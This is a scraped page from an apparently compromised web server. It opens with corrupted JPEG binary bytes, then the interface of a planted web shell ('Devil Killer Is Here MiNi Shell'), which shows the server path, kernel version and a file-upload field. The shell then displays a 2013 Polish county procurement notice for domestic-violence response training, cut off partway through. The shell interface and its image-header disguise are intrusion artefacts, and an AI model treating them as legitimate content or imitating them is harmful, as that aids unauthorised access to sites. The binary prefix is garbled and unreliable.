JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130722/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130722/287610-N-2013.html

<p class="kh_header"><b>Świdwin: Przeprowadzenie szkoleń dla Zespołu Użytkowników biorących udział w projekcie Razem Przeciw Razom</b><br>
<b>Numer ogłoszenia: 287610 - 2013; data zamieszczenia: 22.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Świdwiński , ul. Mieszka I 16, 78-300 Świdwin, woj. zachodniopomorskie, tel. 094 3650301, 3650335, faks 094 3650330.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiatswidwinski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie szkoleń dla Zespołu Użytkowników biorących udział w projekcie Razem Przeciw Razom.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1Przedmiotem zamówienia jest: Przeprowadzenie szkoleń dla Zespołu Użytkowników biorących udział w projekcie Razem Przeciw Razom. 
2Projekt został współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Priorytet VII Promocja integracji społecznej w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013.
3Szczegółowy opis przedmiotu zamówienia: 
1)Szkolenie nr 1- skierowane jest do pracowników instytucji pierwszego kontaktu z osobami dotkniętymi przemocą domową - maksymalnie 52 osoby, są to przedstawiciele:
- policji	
- wymiaru sprawiedliwości
- członkowie zespołów kuratorskich
- służby zdrowia	
- ośrodków pomocy społecznej - pracownicy socjalni
- systemu edukacji  - pedagodzy szkolni
- organizacji pozarządowych 

2)Szkolenie nr 2 - skierowane do policjantów oddziału prewencji i dyżurnych - maksymalnie 45 osób.
Opisy zawierają minimalną wymaganą treść warsztatów:
Szkolenie nr 1. Obsługa interesanta (3-dniowe)
Cel szkolenia:
uświadomienie pracownikom instytucji pierwszego kontaktu z osobami dotkniętymi przemocą w rodzinie, jakie znaczenie ma stosowanie spójnych standardów obsługi interesanta w budowaniu wizerunku instytucji tworzących system pomocy,
nabycie umiejętności z zakresu skutecznej komunikacji interpersonalnej, niezbędnej w pracy z interesantami,
nabycie praktycznej wiedzy na temat zasad obowiązujących w kontaktach bezpośrednich i podczas rozmowy telefonicznej,
nabycie wiedzy i umiejętności z zakresu strategii budowania zaufania i pozytywnych relacji z interesantem,
nabycie wiedzy podnoszącej profesjonalizmu pracowników instytucji pierwszego kontaktu z osobami doświadczającymi przemocy w rodzinie w zakresie obsługi interesanta,
nabycie praktycznych umiejętności z zakresu pracy z trudnym interesantem, tj. interesantem wymagającym - znajdującym się w sytuacji kryzysowej; agresywnym; będącym pod wpływem środków odurzających; chorym psychicznie,
nabycie praktycznych umiejętności radzenia sobie z negatywnymi emocjami i stresem w pracy.
Dzień 1.
1. Autoprezentacja i komunikacja, czyli jak zrobić dobre pierwsze wrażenie:
a) autoprezentacja - rodzaje, metody
b) podstawowe zasady efektywnych kontaktów międzyludzkich 
c) skuteczna komunikacja drogą do sprostania potrzebom interesanta:
 wpływ komunikacji werbalnej na jakość obsługi interesanta 
 narzędzia skutecznego porozumiewania się
 bariery komunikacyjne i ich pokonywanie
 sztuka rozmawiania
 aktywne słuchanie
 komunikacja niewerbalna i jej znaczenie dla obsługi interesanta
 rola komunikacji werbalnej i niewerbalnej 
d) wypracowanie własnego (indywidualnego) stylu pracy z interesantem.
Dzień 2.
1. Rozmowa z interesantem 
a) etapy i techniki prowadzenia rozmowy w zależności od rodzaju interesanta, ze szczególnym uwzględnieniem potrzeb osób doświadczających przemocy w rodzinie
b) specyfika rozmowy telefonicznej
2. Jak sobie radzić z trudnym interesantem tj. interesantem wymagającym - znajdującym się w sytuacji kryzysowej; agresywnym; będącym pod wpływem środków odurzających; chorym psychicznie
a) metody i techniki pracy z różnymi grupami interesantów w zależności od ich specyfiki
b) metody i techniki reagowania na potrzeby interesantów - empatyczne podejście do interesantów doświadczających przemocy w rodzinie
3. Wywieranie wpływu
a) jak demaskować techniki manipulacji i perswazji stosowane przez interesantów
b) reguły wywierania wpływ
Dzień 3. 
1. Stres w pracy - jak sobie z nim radzić
a) negatywne emocje
b) stres
c) modele zachowań oraz techniki radzenia sobie ze stresem i negatywnymi emocjami w pracy z interesantem 
d) zarządzanie stresem i własnymi emocjami - jak to robić skutecznie
2. Asertywność w pracy z klientem
Szkolenie nr 2. Praca z klientem w kryzysie, empatia (1-dniowe dla 3 grup x 15 osób)
Cel szkolenia:
nabycie wiedzy przez policjantów w zakresie realizacji procedury Niebieskiej Karty 
uświadomienie policjantom, jakie znaczenie ma stosowanie spójnych standardów obsługi interesanta w budowaniu wizerunku instytucji tworzących system pomocy,
nabycie praktycznych umiejętności z zakresu pracy z trudnym interesantem, tj. interesantem wymagającym - znajdującym się w sytuacji kryzysowej; agresywnym; będącym pod wpływem środków odurzających; chorym psychicznie, szczególnie podczas interwencji
nabycie praktycznych umiejętności radzenia sobie z negatywnymi emocjami i stresem w pracy oraz sposoby zachowania i reagowania w bezpośrednim kontakcie z klientem agresywnym
Dzień 1
1.Procedura Niebieskiej Karty.
2.Prowadzenie interwencji oraz rozmowa z interesantem 
a) etapy i techniki prowadzenia rozmowy w trakcie interwencji w zależności od rodzaju klienta, ze szczególnym uwzględnieniem potrzeb osób doświadczających przemocy w rodzinie.
3.Jak sobie radzić z trudnym interesantem tj. interesantem wymagającym - znajdującym się w sytuacji kryzysowej; agresywnym; będącym pod wpływem środków odurzających; chorym psychicznie.
a) metody i techniki pracy z różnymi grupami interesantów w zależności od ich specyfiki
b) metody i techniki reagowania na potrzeby interesantów - empatyczne podejście do interesantów doświadczających przemocy w rodzinie.
4. Wywieranie wpływu
a) jak demaskować techniki manipulacji i perswazji stosowane przez klientów, szczególnie w trakcie interwencji.
b) reguły wywierania wpływ.

4Dodatkowe wymagania:
1)Dla szkolenia nr 1 i 2:
a)metodyka szkoleń: wykład  i ćwiczenia warsztatowe;
b)koszty dojazdu, zakwaterowania i wyżywienia trenerów pokrywa Wykonawca; 
c)Wykonawca przygotuje materiały własne i opracowania wykładowców obejmujące swoim zakresem tematykę szkolenia spięte w estetyczny sposób lub zbindowane,  które zostaną wydane każdemu uczestnikowi szkolenia w momencie rozpoczęcia szkolenia (oznakowane zgodnie z wytycznymi EFS);
d)Wykonawca dostarczy materiały piśmiennicze (długopis, notatnik formatu A4), które po zakończeniu szkolenia przekaże każdemu z uczestników na własność;
e)Wykonawca przygotuje i wyda na zakończenie szkolenia uczestnikom szkoleń zaświadczenia o ich ukończeniu (oznakowane zgodnie z wytycznymi EFS);
f)Zamawiający pokrywa koszty: wynajęcia sal szkoleniowych wraz z niezbędnym wyposażeniem i sprzętem (projektor, tablice typu flipchart), poczęstunki i zakwaterowania uczestników szkoleń.
g)Wykonawca przygotowuje sprawozdania z przebiegu każdego szkolenia.
h)Wykonawca przeprowadza ankiety ewaluacyjnej ex-ante i ex-post.
2)Dla szkolenia nr 1:
a)ćwiczenia warsztatowe prowadzone będą równolegle w trzech grupach. Każdą grupę warsztatową prowadzi jeden trener; Wykonawca jest zobowiązany zapewnić pracę 3 trenerów po jednym w każdej z trzech grup równolegle. 
b)wykłady prowadzone będą dla całej grupy Użytkowników (maksymalnie 52 osoby) przez  minimum jednego trenera;
c)zajęcia 3 dniowe prowadzone będą w wymiarze łącznie 24 godziny zajęć dydaktycznych w ciągu trzech następujących po sobie dniach tygodnia (od poniedziałku do piątku). Poprzez godzinę zajęć dydaktycznych Zamawiający rozumie godzinę lekcyjną, czyli 45 minut zegarowych. 
d)miejsce szkolenia zostanie wskazane przez Zamawiającego. Ośrodek szkoleniowy zostanie wyłoniony w odrębnym postępowaniu, znajdował się będzie w promieniu do 80 km od Świdwina (woj. zachodniopomorskie).
e)Preferowany termin realizacji szkolenia: 3 dni w terminie 16-20 września 2013 r.

3)Dla szkolenia nr 2:
a)zajęcia prowadzone nierównolegle dla trzech grup 15-sto osobowych w wymiarze 8 godzin dydaktycznych; poprzez godzinę zajęć dydaktycznych Zamawiający rozumie godzinę lekcyjną, czyli 45 minut zegarowych.
b)zajęcia prowadzone będą w terminach: 11 września 2013 r., 18 września 2013 r., 25 września 2013 r.
c)miejsce realizacji szkoleń: miasto Świdwin (2 terminy) miasto Połczyn-Zdrój (1 termin)..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 25.09.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu Zamawiający nie wymaga wnoszenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia (załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział Wykonawcy, którzy w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie - wykonał lub wykonuje należycie, co najmniej 3 usługi szkoleniowe, których przedmiotem było przeprowadzenie szkoleń dla minimum 15 osób, w wymiarze co najmniej 70 godzin dydaktycznych, przy czym co najmniej jedna z tych usług została  zrealizowana w ramach projektu dofinansowanego ze środków Unii Europejskiej, w tym co najmniej 1 usługę szkoleniową tożsamą z przedmiotem zamówienia oraz dokumenty potwierdzające,  że usługi zostały wykonane należycie.
Przez usługi szkoleniowe tożsame z przedmiotem zamówienia Zamawiający rozumie wykonanie usług, których przedmiotem było przeprowadzenie szkoleń dla pracowników instytucji pierwszego kontaktu z przypadkami przemocy w rodzinie obejmujących w zakresie merytorycznym minimum połowę elementów wymienionych w Rozdz. 3 pkt 3 minimalna wymagana treść szkolenia
Wykonawca składa ofertę z podaniem ilości wykonanych szkoleń, liczby godzin szkoleń, przedmiotu, dat wykonania i liczby odbiorców oraz załączonymi dowodami potwierdzającymi, że usługi te zostały wykonane lub są wykonywane należycie.

Zamawiający oceni czy Wykonawca spełnił ww. warunek na podstawie dokumentów złożonych wraz z ofertą (załącznik nr  6 do SIWZ), zgodnie z formułą spełnia nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia (załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział Wykonawcy, którzy dysponują przynajmniej 3 osobami (trenerami) dla Szkolenia nr 1 lub przynajmniej 1 osobą dla Szkolenia 2, z których każda:
 
I.	Posiada minimum 3-letnie doświadczenie w prowadzeniu szkoleń/warsztatów, które odpowiadają swoim rodzajem (tematyką) szkoleniu objętemu przedmiotem zamówienia odpowiednio dla szkolenia nr 1 i dla szkolenia nr 2, w grupie nie mniejszej niż 15 osób. 
lub 
II.	Przeprowadziła co najmniej 3 usługi szkoleniowe, których przedmiotem było przeprowadzenie szkoleń dla minimum 15 osób, w wymiarze co najmniej 70 godzin dydaktycznych. 
lub
III.	Posiada minimum 3-letnie doświadczenie w pracy trenerskiej w zakresie tematyki dotyczącej przedmiotu zamówienia.  

Zamawiający oceni czy Wykonawca spełnił ww. warunek na podstawie dokumentów złożonych wraz z ofertą (załącznik nr  5 do SIWZ), zgodnie z formułą spełnia nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia (załącznik nr 2 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Projekt umowy stanowi załącznik nr 4 do SIWZ.
2.	Zamawiający przewiduje możliwość zmiany umowy w następującym zakresie:
1) zmiany danych adresowych Zamawiającego lub Wykonawcy;
2) w przypadku jeżeli zmiana umowy jest korzystna dla Zamawiającego;
3) Wynagrodzenie Wykonawcy może ulec zmianie tylko w przypadku ustawowej zmiany stawki VAT. Zmiany wprowadzone zostaną po wcześniejszym zgłoszeniu przez którąkolwiek ze stron umowy, faktu zaistnienia okoliczności warunkującej konieczność wprowadzenia zmiany oraz obustronnej ich akceptacji.
3.	Wszelkie zmiany do umowy wymagają zgody obydwu stron pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiatswidwinski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Świdwinie 
ul. Mieszka I 16 (pok.33)
78-300 Świdwin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.07.2013 godzina 09:00, miejsce: budynek Starostwa Powiatowego w Świdwinie, Biuro Projektu Razem Przeciw Razom, ul. Mieszka I 16 (pok.33), 78-300 Świdwin.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt został współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Priorytet VII Promocja integracji społecznej w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przeprowadzenie szkoleń dla Zespołu Użytkowników biorących udział w projekcie Razem Przeciw Razom.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)Szkolenie nr 1- skierowane jest do pracowników instytucji pierwszego kontaktu z osobami dotkniętymi przemocą domową - maksymalnie 52 osoby, są to przedstawiciele:
policji	
wymiaru sprawiedliwości członkowie zespołów kuratorskich
służby zdrowia	
ośrodków pomocy społecznej - pracownicy socjalni
systemu edukacji  - pedagodzy szkolni
organizacji pozarządowych 
Szkolenie nr 1. Obsługa interesanta (3-dniowe)
Cel szkolenia:
uświadomienie pracownikom instytucji pierwszego kontaktu z osobami dotkniętymi przemocą w rodzinie, jakie znaczenie ma stosowanie spójnych standardów obsługi interesanta w budowaniu wizerunku instytucji tworzących system pomocy,
nabycie umiejętności z zakresu skutecznej komunikacji interpersonalnej, niezbędnej w pracy z interesantami,
nabycie praktycznej wiedzy na temat zasad obowiązujących w kontaktach bezpośrednich i podczas rozmowy telefonicznej,
nabycie wiedzy i umiejętności z zakresu strategii budowania zaufania i pozytywnych relacji z interesantem,
nabycie wiedzy podnoszącej profesjonalizmu pracowników instytucji pierwszego kontaktu z osobami doświadczającymi przemocy w rodzinie w zakresie obsługi interesanta,
nabycie praktycznych umiejętności z zakresu pracy z trudnym interesantem, tj. interesantem wymagającym - znajdującym się w sytuacji kryzysowej; agresywnym; będącym pod wpływem środków odurzających; chorym psychicznie,
nabycie praktycznych umiejętności radzenia sobie z negatywnymi emocjami i stresem w pracy.

Dzień 1.
1. Autoprezentacja i komunikacja, czyli jak zrobić dobre pierwsze wrażenie:
a) autoprezentacja - rodzaje, metody
b) podstawowe zasady efektywnych kontaktów międzyludzkich 
c) skuteczna komunikacja drogą do sprostania potrzebom interesanta:
wpływ komunikacji werbalnej na jakość obsługi interesanta 
narzędzia skutecznego porozumiewania się
bariery komunikacyjne i ich pokonywanie
sztuka rozmawiania
aktywne słuchanie
komunikacja niewerbalna i jej znaczenie dla obsługi interesanta
rola komunikacji werbalnej i niewerbalnej 
d) wypracowanie własnego (indywidualnego) stylu pracy z interesantem.

Dzień 2.
1. Rozmowa z interesantem 
a) etapy i techniki prowadzenia rozmowy w zależności od rodzaju interesanta, ze szczególnym uwzględnieniem potrzeb osób doświadczających przemocy w rodzinie
b) specyfika rozmowy telefonicznej
2. Jak sobie radzić z trudnym interesantem tj. interesantem wymagającym - znajdującym się w sytuacji kryzysowej; agresywnym; będącym pod wpływem środków odurzających; chorym psychicznie
a) metody i techniki pracy z różnymi grupami interesantów w zależności od ich specyfiki
b) metody i techniki reagowania na potrzeby interesantów - empatyczne podejście do interesantów doświadczających przemocy w rodzinie
3. Wywieranie wpływu
a) jak demaskować techniki manipulacji i perswazji stosowane przez interesantów
b) reguły wywierania wpływ

Dzień 3. 
1. Stres w pracy - jak sobie z nim radzić
a) negatywne emocje
b) stres
c) modele zachowań oraz techniki radzenia sobie ze stresem i negatywnymi emocjami w pracy z interesantem 
d) zarządzanie stresem i własnymi emocjami - jak to robić skutecznie
2. Asertywność w pracy z klientem

4Dodatkowe wymagania:
1)Dla szkolenia nr 1 i 2:
a)metodyka szkoleń: wykład  i ćwiczenia warsztatowe;
b)koszty dojazdu, zakwaterowania i wyżywienia trenerów pokrywa Wykonawca; 
c)Wykonawca przygotuje materiały własne i opracowania wykładowców obejmujące swoim zakresem tematykę szkolenia spięte w estetyczny sposób lub zbindowane,  które zostaną wydane każdemu uczestnikowi szkolenia w momencie rozpoczęcia szkolenia (oznakowane zgodnie z wytycznymi EFS);
d)Wykonawca dostarczy materiały piśmiennicze (długopis, notatnik formatu A4), które po zakończeniu szkolenia przekaże każdemu z uczestników na własność;
e)Wykonawca przygotuje i wyda na zakończenie szkolenia uczestnikom szkoleń zaświadczenia o ich ukończeniu (oznakowane zgodnie z wytycznymi EFS);
f)Zamawiający pokrywa koszty: wynajęcia sal szkoleniowych wraz z niezbędnym wyposażeniem i sprzętem (projektor, tablice typu flipchart), poczęstunki i zakwaterowania uczestników szkoleń.
g)Wykonawca przygotowuje sprawozdania z przebiegu każdego szkolenia.
h)Wykonawca przeprowadza ankiety ewaluacyjnej ex-ante i ex-post.
2)Dla szkolenia nr 1:
